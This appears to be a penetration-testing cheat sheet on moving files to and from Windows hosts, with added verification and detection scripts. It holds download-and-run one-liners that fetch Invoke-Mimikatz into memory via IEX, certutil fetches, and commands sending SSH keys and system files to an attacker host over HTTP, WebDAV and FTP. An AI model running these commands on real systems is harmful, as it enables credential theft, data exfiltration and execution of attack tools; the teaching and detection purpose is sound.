Windows
POWERSHELL
Base64 Encode & Decode Lin -> Win
Check SSH Key MD5 Hash
md5sum id_rsa
Encode SSH Key to Base64
cat id_rsa | base64 -w 0;echo
justimaginethisissomerandomhashbecauseyoudontcareandidontcare=
Decoding SSH Key on Windows machine
PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("justimaginethisissomerandomhashbecauseyoudontcareandidontcare="))
Confirming the MD5 Hashes Match
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5
Note: This method is not always usable, because cmd.exe has a maximum string length of 8191 characters. A web shell may also return an error when given a string this large.
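The decode and hash-check steps above combined into one function, as an added example that is not part of the original notes: it deletes the file if its MD5 differs from the one `md5sum` reported. The function name, parameters and sample data are assumptions made for illustration.

```powershell
# Added example; Restore-Base64File and its parameters are hypothetical names.
function Restore-Base64File {
    param(
        [Parameter(Mandatory)][string]$Base64,
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$ExpectedMd5
    )

    # cmd.exe limits a command line to 8191 characters, so a string longer
    # than that cannot be delivered as a single cmd.exe argument.
    if ($Base64.Length -gt 8191) {
        Write-Warning "Base64 string is $($Base64.Length) characters, above the 8191-character cmd.exe limit."
    }

    try {
        $bytes = [Convert]::FromBase64String($Base64.Trim())
    } catch {
        throw "Input is not valid Base64 (truncated or altered in transit)."
    }

    [IO.File]::WriteAllBytes($Path, $bytes)
    $actual = (Get-FileHash -LiteralPath $Path -Algorithm MD5).Hash

    # Get-FileHash prints upper-case hex and md5sum lower-case, so compare
    # case-insensitively.
    if ($actual -ine $ExpectedMd5.Trim()) {
        Remove-Item -LiteralPath $Path -Force
        throw "MD5 mismatch: expected $ExpectedMd5, got $actual. File removed."
    }
    [pscustomobject]@{ Path = $Path; Bytes = $bytes.Length; MD5 = $actual }
}

# Constructed sample: the ASCII text "constructed ok" and its MD5, computed locally.
$raw    = [Text.Encoding]::ASCII.GetBytes('constructed ok')
$sample = [Convert]::ToBase64String($raw)
$md5    = [BitConverter]::ToString(
    [Security.Cryptography.MD5]::Create().ComputeHash($raw)).Replace('-', '')
Restore-Base64File -Base64 $sample -Path (Join-Path $env:TEMP 'b64-demo.bin') -ExpectedMd5 $md5
```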
Base64 Encode & Decode Win -> Lin
The section above covered encoding on Linux and decoding in PowerShell. This one covers the opposite direction: encode in PowerShell and decode on Linux.
Encode File Using Powershell
# If you don't need the output copied to the clipboard, remove the pipe to Set-Clipboard
PS C:\> [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Tools\2025_BloodHound.zip")) | Set-Clipboard
# Get hash
Decode Base64 String in Linux
echo justimaginethisissomerandomhashbecauseyoudontcareandidontcare= | base64 -d > 2025_BloodHound.zip
# Or if you encoded file into clipboard, just paste output into file, and decode
base64 -d bhoutput.txt > BH_GRAPH.zip
Get & Check Hash
PS C:\> Get-FileHash "C:\Tools\2025_BloodHound.zip" -Algorithm MD5 | select Hash
$ md5sum 2025_BloodHound.zip
Web Downloads
In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP. The following table describes WebClient methods for downloading data from a resource.
File Download
#Syntax: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')
#Syntax: (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFileAsync('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'PowerViewAsync.ps1')
PS C:\> Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
PS C:\> powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
PowerShell DownloadString - Fileless Method. Fileless attacks work by using operating system functions to download the payload and execute it directly. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or its alias IEX.
PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
Common Errors
Internet Explorer Error
PS C:\> Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
PS C:\carnifex17> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX
SSL/TLS Untrusted certificate error
PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PowerShell Web Uploads
PowerShell doesn't have a built-in upload function, so we need to use Invoke-WebRequest or Invoke-RestMethod. We can also use the uploadserver module for Python. To install it:
pip3 install uploadserver
Turn On Web Server with Upload
python3 -m uploadserver
PowerShell Script to Upload a File to Python Upload Server
PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS C:\> Invoke-FileUpload -Uri http://13.13.13.13:8000/upload -File C:\Windows\System32\drivers\etc\hosts
PowerShell Base64 Web Upload. Convert file to base64 and send it using Invoke-WebRequest with POST method.
PS C:\> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\> Invoke-WebRequest -Uri http://13.13.13.13:8000/ -Method POST -Body $b64
nc -lvnp 8000
echo <base64> | base64 -d -w 0 > hosts
SMB
Downloads
Create the SMB Server
sudo impacket-smbserver share -smb2support /tmp/smbshare
Copy a File from the SMB Server
C:\> copy \\192.168.220.133\share\nc.exe
In some scenarios an error will forbid unauthenticated guest access, so we can create an SMB server with authentication instead.
Create the SMB Server with a Username and Password
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
Mount the SMB Server with Username and Password
C:\> net use n: \\192.168.220.133\share /user:test test
Uploads
SMB uploads are trickier because companies usually block uploads to SMB, since they could cause a huge problem. But we can use HTTP or HTTPS instead. This works because when you use SMB, it first attempts to connect using the SMB protocol, and if no SMB share is available, it tries to connect using HTTP. For this we need the WebDAV protocol, which enables a web server to behave like a file server. First you need to install it:
sudo pip install wsgidav cheroot
Using the WebDav Python module
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Connecting to the WebDAV Share. DavWWWRoot isn't a folder; it's a special keyword that tells WebDAV that we are connecting to the root of the WebDAV server. You could instead use any existing directory when connecting, for example sharefolder.
C:\> dir \\13.13.13.13\DavWWWRoot
Uploading Files using SMB
C:\> copy C:\Users\john\Desktop\SourceCode.zip \\13.13.13.13\DavWWWRoot\
C:\> copy C:\Users\john\Desktop\SourceCode.zip \\13.13.13.13\sharefolder\
FTP
Downloads
Installing FTP Server python3 module
sudo pip3 install pyftpdlib
Setting up a Python3 FTP Server
sudo python3 -m pyftpdlib --port 21
Transferring Files from an FTP Server Using Powershell
PS C:\> (New-Object Net.WebClient).DownloadFile('ftp://13.13.13.13/file.txt', 'C:\Users\Public\ftp-file.txt')
Create a Command File for the FTP Client and Download the Target File
C:\> echo open 13.13.13.13 > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo GET file.txt >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open 13.13.13.13
Log in with USER and PASS first.
ftp> USER anonymous
ftp> GET file.txt
ftp> bye
C:\> more file.txt
This is a test file
Uploads
For this we also use pyftpdlib, but we need to specify the --write option to allow clients to upload files to our attack host.
Starting FTP Server
sudo python3 -m pyftpdlib --port 21 --write
Powershell Upload File
PS C:\> (New-Object Net.WebClient).UploadFile('ftp://13.13.13.13/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
Create a Command File for the FTP Client to Upload a File
C:\> echo open 13.13.13.13 > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open 13.13.13.13
Log in with USER and PASS first.
ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
CERTUTIL
File Transfer
PS C:\> certutil.exe -urlcache -split -f http://13.13.13.13:1337/youknowim.bat youknowim.bat
File Encode
C:\> certutil -encode file1 encodedfile
File Decode
C:\> certutil -decode encodedfile file2
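The transfer commands on this page leave recognizable strings in command lines recorded by process-creation or PowerShell script-block logging. The following is an added example, not part of the original notes, that matches those strings against a list of command lines; the rule names and function name are hypothetical, and the sample lines are constructed from the commands shown above.

```powershell
# Added example. Patterns are matched case-insensitively (PowerShell -match default).
$rules = [ordered]@{
    'WebClient download'     = 'Net\.WebClient\)\.Download(File|FileAsync|String)\('
    'In-memory execution'    = '\b(IEX|Invoke-Expression)\b'
    'Base64 file write'      = 'WriteAllBytes\(.*FromBase64String\('
    'certutil URL fetch'     = 'certutil(\.exe)?\s.*-urlcache\b'
    'certutil encode/decode' = 'certutil(\.exe)?\s+-(encode|decode)\b'
    'Scripted ftp.exe'       = '\bftp(\.exe)?\s.*-s:'
    'WebDAV over UNC path'   = '\\\\[^\\]+\\DavWWWRoot'
}

function Find-TransferIndicator {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$CommandLine)
    process {
        # Collect the name of every rule whose pattern occurs in this line.
        $hits = foreach ($name in $rules.Keys) {
            if ($CommandLine -match $rules[$name]) { $name }
        }
        if ($hits) {
            [pscustomobject]@{ Rules = $hits -join '; '; CommandLine = $CommandLine }
        }
    }
}

# Constructed sample command lines (192.0.2.10 is a documentation address).
$samples = @(
    'powershell -nop -c "iex(New-Object Net.WebClient).DownloadString(''http://192.0.2.10/a.ps1'')"'
    'certutil.exe -urlcache -split -f http://192.0.2.10:1337/file.bat file.bat'
    'certutil -decode encodedfile file2'
    'cmd /c copy C:\Users\john\Desktop\SourceCode.zip \\192.0.2.10\DavWWWRoot\'
    'ftp -v -n -s:ftpcommand.txt'
    'notepad.exe C:\Users\Public\notes.txt'
)

# Five of the six samples match; the notepad.exe line produces no output.
$samples | Find-TransferIndicator | Format-List
```

In practice the input would come from collected event data rather than an inline array, and the patterns need tuning against legitimate administrative use of the same tools.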